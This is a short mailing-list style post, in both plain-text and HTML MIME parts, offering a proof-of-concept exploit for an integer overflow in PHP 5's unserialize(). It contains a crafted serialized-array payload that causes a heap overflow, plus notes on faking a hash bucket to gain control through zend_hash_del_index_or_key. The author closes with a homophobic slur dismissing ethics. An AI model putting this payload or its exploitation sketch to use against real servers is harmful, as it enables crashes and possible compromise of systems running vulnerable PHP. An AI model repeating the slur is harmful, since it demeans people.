PHP 5 ecalloc memory manager unserialize() array integer overflow proof of concept exploit.
d4d2a7ebf01f65bf0871fe99b935491efb8bb3a3e3e029d5317331679ec0f317
------=_Part_91297_20240413.1161096528744
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
<?
print_r(unserialize('a:1073741823:{i:0;s:30:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}'));
?>
in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow
here segfault in zend_hash_find() but it's possible to fake the bucket and
exploit a zend_hash_del_index_or_key
i tried a memory dump , just fake the bucked with the pointer of the
$GLOBALS's bucket but segfault before in memory_shutdown...
don't cry a river :P
ethic is for gayz
------=_Part_91297_20240413.1161096528744
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
<?<br> print_r(unserialize('a:1073741823:{i:0;s:30:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}'));<br>?><br><br>in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow<br>here segfault in zend_hash_find() but it's possible to fake the bucket and exploit a zend_hash_del_index_or_key
<br>i tried a memory dump , just fake the bucked with the pointer of the $GLOBALS's bucket but segfault before in memory_shutdown...<br><br>don't cry a river :P<br>ethic is for gayz<br><br>
------=_Part_91297_20240413.1161096528744--